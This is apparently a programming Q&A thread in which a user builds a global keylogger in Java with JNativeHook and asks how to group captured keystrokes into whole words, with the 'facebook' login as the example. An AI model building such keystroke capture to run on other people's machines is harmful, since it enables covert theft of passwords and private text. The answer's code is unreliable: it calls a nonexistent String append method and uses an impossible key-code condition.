# Using KeyLoggers in Java

Tags: java, keyboard, keyboard-hook, keylogger

I am trying to implement  key loggers in java using Jnative hook.I 'm able to record every key movement.This is the output which i am able to get till now

When i'm trying to type "facebook" this is how it is recording

```
 f
 a
 c
 e
 b
 o
 o
 k
```

But i want it to print it like a single word like every other keylogger does.
which means when i enter something like facebook.it should record it as "facebook" but not like recording every keyboard char.

Below posted is my code:

```
public class key_logger implements NativeKeyListener {

@Override
public void nativeKeyPressed(NativeKeyEvent nativeKeyEvent) {
     System.out.print(nativeKeyEvent.getKeyChar());

if(nativeKeyEvent.getKeyCode()== NativeKeyEvent.VK_ESCAPE)
{
    //System.out.println("Ter");
    GlobalScreen.unregisterNativeHook();
}
}

@Override
public void nativeKeyReleased(NativeKeyEvent nativeKeyEvent) {


}

@Override
public void nativeKeyTyped(NativeKeyEvent nativeKeyEvent) {

    System.out.println(nativeKeyEvent.getKeyChar());

}

public static void main(String[] args)
{
    try
    {
      GlobalScreen.registerNativeHook();
    } catch (NativeHookException e) {
        System.out.println("There is a problem registering with the hook");
        e.printStackTrace();
        System.exit(1);
    }

    GlobalScreen.getInstance().addNativeKeyListener(new key_logger());

}
}
```

Comment: System.out.print() instead of println might help

Comment: @Jimmy That didnot help either

Comment: Do you mean you want it to display/print out all at one time?

Comment: @Haloboy yea...! it has to record the keystroke but it should print as a  word ....i mean instead of printing F A C E B O O K...just try printing FACEBOOk

Comment: You have to either keep a word "bank" so that the program knows a word has been input or as suggested you can trust the user and request that they press enter or space before the word is printed.

Answer (score 0):

Store the characters in a `String` and whenever you come across `enter` or `spacebar` being pressed just print the `String` make sure to reinitialize the `String`

```
   String string ="";
    @Override
public void nativeKeyTyped(NativeKeyEvent nativeKeyEvent) {
    string.append(nativeKeyEvent.getKeyChar());
    if(nativeKeyEvent.getKeyCode()=='key code for enter' && nativeKeyEvent.getKeyCode()== 'key code for space'){
        System.out.println(string);
        string="";
   }
}
```